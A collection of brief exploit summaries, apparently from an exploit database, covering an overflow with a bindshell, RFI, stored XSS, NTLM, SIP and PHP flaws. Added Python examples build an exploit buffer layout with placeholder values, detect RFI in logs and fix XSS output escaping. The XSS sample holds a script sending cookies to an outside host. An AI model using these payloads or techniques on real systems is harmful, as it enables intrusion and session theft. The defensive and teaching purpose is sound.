The exploit spawns a shell on TCP port 4444 and connects to it. At the time of the overflow we control EAX, which is used in an indirect call at 00420C64: call dword ptr [eax + 4]. ECX points into our buffer at that moment. So if the DWORD at [eax + 4] points to an instruction of the form call dword ptr [ecx + xx], and we place a pointer to our shellcode at ecx + xx inside the buffer, control passes to the shellcode. The exploit uses hardcoded addresses, which worked on Windows 2000 Server SP4 machines. Credit for the discovery and the PoC goes to Evgeny Legerov.
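The pointer chain above, written out as an added example in Python (not the original exploit): build_payload() lays out the buffer so that [eax + 4] holds the address of a call dword ptr [ecx + xx] gadget and [ecx + xx] holds a pointer to the shellcode, and resolve_chain() follows the two dereferences the CPU will make, so the layout can be checked before anything is sent. Every address, offset and the int3 placeholder shellcode are constructed assumptions; the real exploit's hardcoded values are not on this page.

```python
import struct

# All addresses and offsets below are constructed placeholders standing in for the
# hardcoded values of the original exploit; they are not taken from the real target.
BUF_BASE      = 0x00450000   # assumed address at which our buffer lands in memory
GADGET_ADDR   = 0x00420C90   # assumed address of a "call dword ptr [ecx + xx]" instruction
XX            = 0x10         # assumed displacement xx used by that gadget
EAX_OFFSET    = 0x40         # buffer offset of the fake object that EAX points at
ECX_OFFSET    = 0x80         # buffer offset that ECX points at when the call executes
SHELLCODE_OFF = 0x100        # buffer offset where the shellcode is placed
SHELLCODE     = b"\xcc" * 16 # placeholder (int3 padding) for the real bindshell payload
PAYLOAD_SIZE  = 0x200

def dword(value):
    """Little-endian 32-bit value, as the x86 target reads it."""
    return struct.pack("<I", value)

def build_payload():
    buf = bytearray(b"A" * PAYLOAD_SIZE)
    # call dword ptr [eax + 4]: the DWORD at eax+4 must be the gadget's address
    buf[EAX_OFFSET + 4:EAX_OFFSET + 8] = dword(GADGET_ADDR)
    # call dword ptr [ecx + xx]: the DWORD at ecx+xx must point at the shellcode
    buf[ECX_OFFSET + XX:ECX_OFFSET + XX + 4] = dword(BUF_BASE + SHELLCODE_OFF)
    buf[SHELLCODE_OFF:SHELLCODE_OFF + len(SHELLCODE)] = SHELLCODE
    return bytes(buf)

def read_dword(buf, addr):
    """Read the DWORD the CPU would read at `addr`, given the buffer sits at BUF_BASE."""
    off = addr - BUF_BASE
    if not 0 <= off <= len(buf) - 4:
        raise ValueError("dereference 0x%08x falls outside the buffer" % addr)
    return struct.unpack_from("<I", buf, off)[0]

def resolve_chain(buf, eax, ecx):
    """Follow the two indirect calls and return (first_target, final_target).
    Raises if the first hop does not reach the gadget or a hop leaves the buffer."""
    first = read_dword(buf, eax + 4)          # what "call dword ptr [eax + 4]" jumps to
    if first != GADGET_ADDR:
        raise ValueError("[eax+4] does not point at the call [ecx+xx] gadget")
    final = read_dword(buf, ecx + XX)         # what "call dword ptr [ecx + xx]" jumps to
    return first, final

if __name__ == "__main__":
    payload = build_payload()
    eax = BUF_BASE + EAX_OFFSET   # the value we supply for EAX through the overflow
    ecx = BUF_BASE + ECX_OFFSET   # where ECX happens to point when the call executes
    print("chain: 0x%08x -> 0x%08x" % resolve_chain(payload, eax, ecx))
```

Running it prints the two hops. Checking the chain offline like this catches off-by-four mistakes in the offsets, which on the real target only show up as a crash at 00420C64.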
Monster Top List <= 1.4.2 is vulnerable to remote file inclusion leading to remote command execution. An attacker sends functions.php a request whose parameter carries the path of an attacker-controlled script; the file is included and executed, allowing arbitrary commands to be run on the target system.
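An added detection example in Python (not part of the original advisory): it scans web-server access-log lines for requests whose query parameters decode to a remote URL, the signature of an RFI attempt against functions.php or any other include target. The log lines are constructed, and the parameter name root_path is an assumption, since the page does not name the vulnerable parameter.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines in Apache combined format, not real traffic.
# root_path is an assumed parameter name; the page does not name the vulnerable one.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2006:13:55:36 +0000] "GET /toplist/functions.php?root_path=http://198.51.100.7/evil.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.9 - - [10/Oct/2006:13:55:40 +0000] "GET /toplist/functions.php?id=3 HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
203.0.113.5 - - [10/Oct/2006:13:56:01 +0000] "GET /toplist/index.php?page=%68ttp://198.51.100.7/evil.txt HTTP/1.1" 200 800 "-" "Mozilla/4.0"
198.51.100.20 - - [10/Oct/2006:13:57:12 +0000] "GET /toplist/out.php?url=https%3A%2F%2Fwww.example.com%2F HTTP/1.1" 302 0 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftps?)://', re.IGNORECASE)

def find_rfi_attempts(lines, scripts=None):
    """Return one record per query parameter whose decoded value is a remote URL.
    parse_qsl percent-decodes values, so an encoded scheme such as %68ttp:// is
    caught as well. `scripts` optionally restricts the check to those script names."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        script = parts.path.rsplit("/", 1)[-1]
        if scripts is not None and script not in scripts:
            continue
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_SCHEME_RE.match(value):
                hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "script": parts.path, "param": name, "value": value})
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG.splitlines()):
        print("%(ip)s %(script)s %(param)s=%(value)s" % hit)
```

Without a script filter every URL-valued parameter matches, including legitimate redirect parameters such as the out.php line above, so in practice pass the names of the scripts known to be vulnerable or treat the hits as a triage list rather than a verdict.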
Running this creates a file named j.job. When explorer.exe, or any file-open dialog, lists the directory containing that file, notepad.exe is spawned.
This exploit targets the hash_update_file() function in PHP. By repeatedly calling the function and freeing the resource it operates on, an attacker can exhaust resources and potentially crash the server.
A tool for exploiting .NET Remoting services vulnerable to CVE-2014-1806 or CVE-2014-4149. It only works on Windows, although some aspects might work under Mono on *nix.
The PHPFox admin control panel (AdminCP) is vulnerable to stored cross-site scripting (XSS). The User-Agent string of a logged session is written to the user_agent field of the phpfox_log_session table and later displayed on the AdminCP's Online Guests/Bots page. An attacker who gets a malicious User-Agent string logged therefore has arbitrary script executed in the browser of an administrator viewing that page, that is, inside the administrative area of the PHPFox site.
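The rendering defect and its fix, as an added Python example rather than PHPFox code: render_online_guests() builds the table the way the vulnerable page does when escape_output=False (user_agent interpolated raw) and the way it should when escape_output=True (every cell passed through html.escape at output time, because the value is stored raw and cannot be trusted when read back). The session rows, and the payload in the second one, are constructed.

```python
import html

# Constructed rows standing in for phpfox_log_session entries; the second one carries
# a User-Agent string chosen to demonstrate stored XSS. Not real PHPFox data or code.
SAMPLE_SESSIONS = [
    {"ip_address": "203.0.113.10",
     "user_agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/3.6",
     "last_activity": "2010-05-01 12:00:00"},
    {"ip_address": "203.0.113.11",
     "user_agent": '<script>document.location="http://198.51.100.7/c?"+document.cookie</script>',
     "last_activity": "2010-05-01 12:00:05"},
]

def render_online_guests(rows, escape_output=True):
    """Render session rows as an HTML table.
    escape_output=False reproduces the vulnerable pattern: the stored user_agent is
    placed into the page verbatim. escape_output=True is the fix: every cell is
    HTML-escaped at the moment it is written into the document."""
    enc = html.escape if escape_output else (lambda s: s)
    cells = []
    for r in rows:
        cells.append("<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (
            enc(r["ip_address"]), enc(r["user_agent"]), enc(r["last_activity"])))
    return "<table>" + "".join(cells) + "</table>"

def contains_active_content(html_text):
    """Crude marker used here only to show the difference between the two renderings."""
    return "<script" in html_text.lower()

if __name__ == "__main__":
    print(render_online_guests(SAMPLE_SESSIONS, escape_output=False))
    print(render_online_guests(SAMPLE_SESSIONS))
```

Escaping belongs at output time: filtering the User-Agent on the way into the log table would leave every other consumer of that column, and every row logged before the filter existed, unprotected.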
This exploit achieves a full ASLR, DEP and EMET 5.1 bypass in Internet Explorer 8.
This exploit targets Mercur v5.00.14 on Windows. It executes arbitrary code on the target system by sending a specially crafted payload in an NTLM authentication request. The payload is sent in two parts: the first is a base64-encoded string, the second a sequence of string and byte values. On successful exploitation the attacker gains control of the target system.
After receiving a crafted INVITE message, the Cisco 7940 phone reboots immediately. The vulnerability is caused by the phone failing to properly validate the sipURI field of the Remote-Party-ID header in the message.
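The check the phone is described as skipping, written out as an added example in Python (not Cisco's code or the original PoC): parse_remote_party_id() accepts a well-formed Remote-Party-ID name-addr carrying a sip/sips URI and rejects anything else, and validate_invite() applies it to every Remote-Party-ID header of a raw INVITE. The INVITE, the host names, the requirement of the angle-bracket name-addr form and the 256-byte URI bound are constructed assumptions; the page does not say what malformation triggers the reboot.

```python
import re

MAX_URI_LEN = 256  # assumed bound; the page does not say what the phone's limit is

# RFC 3261-style sip/sips URI: optional user@, host (name or bracketed IPv6), optional port, ;params
SIP_URI_RE = re.compile(r"""
    ^(?P<scheme>sips?):
    (?:(?P<user>[A-Za-z0-9\-_.!~*'()&=+$,%]+)@)?
    (?P<host>[A-Za-z0-9.\-]+|\[[0-9A-Fa-f:.]+\])
    (?::(?P<port>\d{1,5}))?
    (?P<params>(?:;[A-Za-z0-9\-_.!~*'()\[\]/:&+$%]+(?:=[A-Za-z0-9\-_.!~*'()\[\]/:&+$%]+)?)*)$
""", re.VERBOSE)

# name-addr: optional quoted or token display name, the URI in angle brackets, then
# header parameters such as ;party=calling;screen=yes
NAME_ADDR_RE = re.compile(
    r'^\s*(?:"(?P<qname>[^"\\]*)"\s*|(?P<tname>[^<"]*?)\s*)'
    r'<(?P<uri>[^<>]*)>(?P<hparams>(?:;[^;=\s]+(?:=[^;\s]+)?)*)\s*$')

def parse_remote_party_id(value):
    """Parse one Remote-Party-ID header value; return (display_name, uri_fields, header_params).
    Raise ValueError for anything that is not a well-formed name-addr with a sip/sips URI."""
    m = NAME_ADDR_RE.match(value)
    if not m:
        raise ValueError("Remote-Party-ID is not a well-formed name-addr")
    uri = m.group("uri")
    if len(uri) > MAX_URI_LEN:
        raise ValueError("sipURI exceeds %d bytes" % MAX_URI_LEN)
    um = SIP_URI_RE.match(uri)
    if not um:
        raise ValueError("malformed sipURI: %r" % uri)
    port = um.group("port")
    if port is not None and not 0 < int(port) <= 65535:
        raise ValueError("sipURI port out of range")
    display = m.group("qname") if m.group("qname") is not None else m.group("tname").strip()
    hparams = {}
    for p in m.group("hparams").split(";"):
        if p:
            k, _, v = p.partition("=")
            hparams[k.lower()] = v or None
    return display, um.groupdict(), hparams

def validate_invite(raw):
    """Validate every Remote-Party-ID header of a raw SIP INVITE and return the parsed list.
    Raises ValueError at the first malformed header, which is where the phone should
    reject the request instead of processing it."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    if not lines[0].startswith("INVITE "):
        raise ValueError("not an INVITE")
    parsed = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "remote-party-id":
            parsed.append(parse_remote_party_id(value))
    return parsed

def make_invite(rpid_value):
    """Constructed INVITE from a hypothetical PBX to the phone; only Remote-Party-ID varies."""
    return ("INVITE sip:7940@192.0.2.10 SIP/2.0\r\n"
            "Via: SIP/2.0/UDP 192.0.2.20:5060;branch=z9hG4bK776asdhds\r\n"
            "From: \"Alice\" <sip:alice@pbx.example.com>;tag=1928301774\r\n"
            "To: <sip:7940@192.0.2.10>\r\n"
            "Call-ID: a84b4c76e66710@192.0.2.20\r\n"
            "CSeq: 314159 INVITE\r\n"
            "Remote-Party-ID: " + rpid_value + "\r\n"
            "Contact: <sip:alice@192.0.2.20>\r\n"
            "Content-Length: 0\r\n\r\n")

if __name__ == "__main__":
    good = make_invite('"Alice" <sip:alice@pbx.example.com>;party=calling;screen=yes')
    print(validate_invite(good))
    try:
        validate_invite(make_invite("<sip:" + "A" * 300 + "@pbx.example.com>"))
    except ValueError as e:
        print("rejected:", e)
```

The length bound is the part a firmware parser most often lacks; the grammar check on top of it rejects a URI with no host, a non-SIP scheme or a missing closing bracket before any field is copied into fixed-size storage.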
This code is a proof of concept for a resource-usage exploit in PHP gd. It uses the Linux x86 bindshell on port 4444 from Metasploit, contains the offsets used for the overwrite, and includes a function for error handling.